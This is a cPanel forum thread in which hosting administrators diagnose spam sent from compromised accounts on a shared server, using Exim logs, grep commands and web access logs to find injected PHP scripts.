The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Anyone can please explain Mail Control Data?

Discussion in 'E-mail Discussions' started by postcd, Aug 14, 2016.

Tags:
  1. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    Hello,

    in the WHM Mail Queue i see SPAMer is sending out e-mails from multiple cPanel accounts
    info@account1.com
    info@account2.com
    It is always info@ and sometimes such mailbox do not exist

    Please can you help to say what means following data i got when clicking queued e-mail in WHM?:

    Mail Control Data:

    mailnull 47 12

    <info@mydomainhere.com>
    1471148307 0
    -helo_name mydomainhere.com
    -host_address ::1.42812
    -interface_address ::1.25
    -received_protocol esmtp
    -aclc _authenticated_local_user 8
    cpanelaccountnamewhichisnotrelatedtothe_mydomainhere.com_cpanel
    -body_linecount 32
    -max_received_linelength 76
    -host_lookup_failed
    XX
    1

    recipientaccounthere@aol.com


    Received:

    from [::1] (port=42812 helo=mydomainhere.com)
    by myservhost.name.here with esmtp (Exim 4.87)
    (envelope-from <info@mydomainhere.com>)
    id 1bYmsV-0008LO-8y
    for recipientaccounthere@aol.com; Sun, 14 Aug 2016 04:18:27 +0000

    X-mailer: Mailer v1.0

    ---------

    It would be greatly helpful if anyone can explain
    a) what this e-mail mean
    b) what means highlighted phrasses i found interesting
    Especialy i found interesting that the cPanel account "cpanelaccountnamewhichisnotrelatedtothe_mydomainhere.com_cpanel" knows about neighbour domains. Probably some spammer injected malicious script or abusing flaw in that single cpanel and then found domains on same server IP and trying to send out SPAM faking sender e-mail addresses? Can such e-mail be delivered when sent from other cPanel than sender e-mail domain? How can i prevent such e-mails processed by exim and sent away?

    Thank you alot
    Thank you alot
     
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello,

    Could you search for one of the messages in /var/log/exim_mainlog and let us know the output? You can use a command such as:

    Code:
    exigrep info@domain /var/log/exim_mainlog
    Thank you.
     
  3. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    we have the same issue on multiple domain.

    Outgoing mail originated from localhost with sender info@somedomain.com for somerecipient@aol.com (in most case the recipient domain is aol but not always).

    We already tried to analyze the exim_mainlog and access_log of these domains but we didn't find any clue. We also run various scan with maldet and rkhunter.

    Is there anything else we can search for?

    Thanks
     
  4. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Could you provide an example of one of the entries in /var/log/exim_mainlog?

    Thank you.
     
  5. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    below you can find an example:
    Code:
    2016-08-20 14:17:50 [23807] 1bb5Di-0006Bz-Ht H=(someclientdomain.com) [127.0.0.1]:38007 I=[127.0.0.1]:25 Warning: Message has been scanned: no virus or other harmful content was found
    2016-08-20 14:17:50 [23807] 1bb5Di-0006Bz-Ht <= info@someclientdomain.com H=(someclientdomain.com) [127.0.0.1]:38007 I=[127.0.0.1]:25 P=esmtp S=1717 M8S=0 id=1476252299.7533613.1471695471308@someclientdomain.com T="RE: hi somerecipient" from <info@someclientdomain.com> for somerecipient@aol.com
    2016-08-20 14:17:50 [23820] cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1bb5Di-0006Bz-Ht
    2016-08-20 14:17:50 [23820] 1bb5Di-0006Bz-Ht SMTP connection identification H= A=127.0.0.1 P=38007 M=1bb5Di-0006Bz-Ht U=nobody ID=99 S=nobody B=authenticated_local_user
    2016-08-20 14:17:53 [23820] 1bb5Di-0006Bz-Ht => somerecipient@aol.com F=<info@someclientdomain.com> P=<info@someclientdomain.com> R=dkim_lookuphost T=dkim_remote_smtp S=2248 H=mailin-03.mx.aol.com [152.163.0.67]:25 I=[185.78.64.20]:50166 X=TLSv1:DHE-RSA-AES256-SHA:256 CV=yes DN="/C=US/ST=Virginia/L=Dulles/O=AOL Inc./OU=AOL Mail/CN=mx.aol.com" C="250 2.0.0 Ok: queued as 91EE0700000AC" QT=3s DT=3s
    2016-08-20 14:17:53 [23820] 1bb5Di-0006Bz-Ht Completed QT=3s
    
     
    #5 Luis Casagrande, Aug 20, 2016
    Last edited by a moderator: Aug 20, 2016
  6. Ameya Barwe

    Ameya Barwe Well-Known Member

    Joined:
    Jan 1, 2016
    Messages:
    49
    Likes Received:
    2
    Trophy Points:
    8
    Location:
    Nashik
    cPanel Access Level:
    Root Administrator
    I think, these emails are being sent from a php script and not from an email account, I recommend you to check access log file of that someclientdomain.com domain name for a presence of malicious file which is present at this path :-
    /home/cPanel_User/access_logs/someclientdomain.com
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    This suggests the email is coming from a script. Try using a command like this to look for directories that have sent out high numbers of emails:

    Code:
    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n
    
    Thank you.
     
  8. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    Hello, take a look please:

    What do you think please?

    When looking up access logs for "somecpaneluserhere", matching 07:** time today:
    grep -Ril "27/Aug/2016:07:3" /home/somecpaneluserhere/access_logs/
    cat /home/somecpaneluserhere/access_logs/*|grep "27/Aug/2016:07:3"

    I can see:
    79.6.173.* - - [27/Aug/2016:07:33:04 +0000] "GET /wp-login.php HTTP/1.1" 404 14 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
    199.201.90.* - - [27/Aug/2016:07:12:25 +0000] "POST /forum/Themes/default/languages/Login.albanian.php HTTP/1.1" 200 840 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
    67.211.37.* - - [27/Aug/2016:07:18:41 +0000] "POST /wp-includes/js/swfupload/plugins/css.php HTTP/1.1" 200 361 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"

    The second and third file was infected by 2 bad lines of code (encoded) so i removed bad lines

    I tried this and "somecpaneluserhere" nor "locallyhosteddomain.com" cpanel was listed within most e-mail sending paths. Does it mean someone knows password to my somecpaneluserhere cpanel? OR some script within that somecpaneluserhere cpanel is sending out spam? i changed that acct password not long time ago and used unguessable long password
     
    #8 postcd, Aug 27, 2016
    Last edited: Aug 27, 2016
  9. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    we did find the source of the SPAM email. It wasn't in any of the account that was "sending" the mail (info@somedomain.com) and that i can find with the following command.

    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

    It was in another account that wasn't sending email but was used send email as other user domain on the same machine. So do not limit searching for malicious script in the account that is actually sending the email.

    We did find it searching for all php script containing eval and searching for potential malicious code in base64. Also we crossrefenced the time of the email being sent with the access_log of the suspected compromised account that we find with the eval search.

    I hope this can help you.
     
    postcd likes this.
  10. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    To answer your earlier question, yes, this suggests the email originates from that account. The steps you completed (changing the account password and removing the infected lines from those files) should address the issue. You may also want to search the term "secure wordpress" on our forums to see examples of how other users have secured their server to help prevent these types of attacks.

    Thank you.
     
  11. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    As i can't update my earlier posts, i will add this one.

    I think good way to find SPAM scripts (these was not detected by:
    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n
    )

    Is to Click SPAM e-mail in WHM e-mail queue or find SPAM log entry in exim_mainlog

    When loooking up Mail Control Data section in WHM E-mail Queue/message

    I seen:
    -aclc _authenticated_local_user 8
    infectedcpanelhere

    In exim_main log i seen:
    (actual_sender=[somecpaneluserhere@host.domainhere.com])

    So it identify infected cpanel. Then lookup first time that message appeared in the queue, in WHM/MailQueue/Message i have example:
    Date: Mon, 12 Sep 2016 08:27:04 +0000 (UTC)
    So i copy hour and tens of minute: "08:2"
    and then cat access log for that cPanel, like:
    cat /usr/local/apache/domlogs/cpanelnamehere/*|grep ".php"|grep -vE "404|gif|jpg|png|robots.txt"|grep -E "08:2"
    Then view files accessed around that time and if found some bad script or injected malicious code, then lookup whole cpanel account for footprints of malicious code (grep -Ril "bad phrasse" /home/cpanelnamehere/public_html). and files that was modiffied in same day like this one (find /home -type f -path /home/virtfs -prune -o -name "*.php" -newermt 2014-11-05 ! -newermt 2014-11-07). That found files modiffied in 2014-11-06
     
    cPanelMichael likes this.
Loading...

Share This Page